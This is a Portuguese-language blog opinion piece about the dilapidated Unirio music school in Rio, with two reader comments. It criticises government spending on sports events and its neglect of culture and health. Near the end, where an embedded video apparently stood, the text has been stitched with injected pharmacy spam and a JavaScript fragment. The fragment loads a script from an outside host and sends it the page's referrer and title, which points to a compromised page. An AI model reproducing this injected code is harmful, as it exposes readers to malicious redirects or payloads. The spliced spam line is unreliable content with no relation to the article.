Artigo

A ideia é acabar com a Unirio

Vejam o vídeo que colocamos à disposição e… chorem!

Caros amigos amantes da música brasileira e da música em geral, queremos chamar a atenção de todos parta o estado precário, aliás muito precário, em que se encontra a Escola de Música da Unirio, na Urca.

 

Vejam o vídeo e chorem… É nestas condições que os alunos têm que se dedicar e estudar para, no futuro, transmitirem aos seus alunos o que aprenderam. Mas como isso é possível nestas condições.

 

A Copa e as Olimpíadas se aproximam e o Brasil se candidatou a promover estes eventos. Não foi obrigado… foi por livre iniciativa. Mas é claro… uma vez que o restante das instituições do país vai de bom para melhor, nada como gastar o nosso dinheiro numa iniciativa que se sustenta por si só (esporte), ao contrário do que estamos vendo neste vídeo.

 

A propósito disso, vi ontem uma reportagem sobre a construção de um estádio no Mato Grosso, por conta da Copa. Se não me engano, vai ser realizado um jogo. Ah! Mas vai ficar para desenvolvimento do desporto no local.

 

A mesma reportagem ouviu dois especialistas em meio ambiente e saúde que são totalmente contra a construção deste estádio, pleiteando que esta verba fosse usada para construir escolas, hospitais, esgotos, água encanada, etc… que costumam ser novidade por lá.

 

Enquanto mostramos estádios construídos com imensas verbas (é preciso cobrir a construção e algo mais), no Mato Grosso morrem crianças de câncer numa taxa absurdamente alta por causa do veneno utilizado nas plantações de soja, milho, etc… Veneno que penetra no alimento, penetra na terra, atingindo a água, e se espalha pelo ar. Mas isso não é importante.

 

Enquanto construímos estádios, etc… megalômanos, a Unirio se esvai em cupins, buracos, péssimas instalações elétricas, etc… desgraça que pode ser bem constatado pelo vídeo que colocamos à disposição.

 

Caramba… o que será preciso acontecer para o governo se mancar? Cair o prédio? Acho até que estão esperando mesmo isso, pois uma simples reforma, mesmo que completa, não daria a chance de se ter um por fora tão generoso como se fosse uma construção nova. Acho que é isso…

 

Mas, não sejamos tão críticos, pois parece haver  um consenso entre nossas autoridades, pois enquanto o governo federal não está nem aí para a escola de música da Unirio, o nosso governador, que Deus não o tenha, declara alto e bom som que o teatro da Barra não é prioridade e, enquanto isso, o prédio recém construído vai se estragando pela falta de uso. Deve ser porque não foi ele que construiu, mas o dinheiro foi nosso de qualquer maneira. Brilhante o nosso governador e mais brilhante ainda quem nele votou.

 

No âmbito federal, as verbas reservadas para os 37 ministérios (Juscelino governou com 12), servem para a manutenção de uma máquina exageradamente exacerbada, para servir de emprego aos amigos.

 

Mas, o que queremos????? Como vai ser preciso cortar verbas para o ano de 2012, o governo elegeu para sofrer o corte justamente o Ministério da Saúde, pois, é claro, confia que os seus pares, muito bem aquinhoados, vão votar e aprovar, certamente, mais um CPMF da vida.

 

É assim que o governo trata seus cidadãos: cobra, aperta, aumenta impostos e não dá nada em volta… pelo contrário, se você vacilar… fica a ver navios mesmo.

Sintam bem a importância que a saúde e a cultura têm para estas pessoas eleitas por nós.

 

Mais uma vez, vejam o vídeo e chorem:

  prednisone prices canadian companies s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Faça seu comentário

2 Comments

  1. Infelizmente, já não é mais o caso de se comentar e sim lamentar e chorar muito mesmo. Que pena, Antônio, que um site de cultura, de arte, enfim, de belezas, tenha que registrar este desastre total. Que país é este o nosso?

  2. Sou um aluno da UNIRIO que pode comprovar todas as coisas que foram citadas acima e a veracidade do vídeo. E os Big Brothers (que não fazem droga nenhuma) são chamados de “heróis”. Nós é que deveríamos sermos chamados de heróis, pois estudamos em salas em que as paredes não são isoladas acusticamente, os pianos estão caindo aos pedaços, não existem bebedouros funcionando (o que, muitas vezes, nos obriga a comprar água para beber no calor escaldante do Rio).
    Fazemos música porque amamos o que fazemos, mas ver a UNIRIO, uma das escolas de música mais respeitadas e bem faladas do país, nesse estado é realmente muito triste. Mas, confesso que, muitas vezes, penso que seremos sempre jogados para escanteio. Afinal, 22 jogadores correndo atrás de uma pelota (com todo o respeito a quem aprecia o futebol) é muito mais importante do que educação e boa cultura e, vamos dizer de passagem, nossa RICA cultura, que é MARCA REGISTRADA de nosso povo.

Leave a Response

Antônio Rodrigues
Apaixonado por música coral, é um dos fundadores e mantenedor do movimento.com.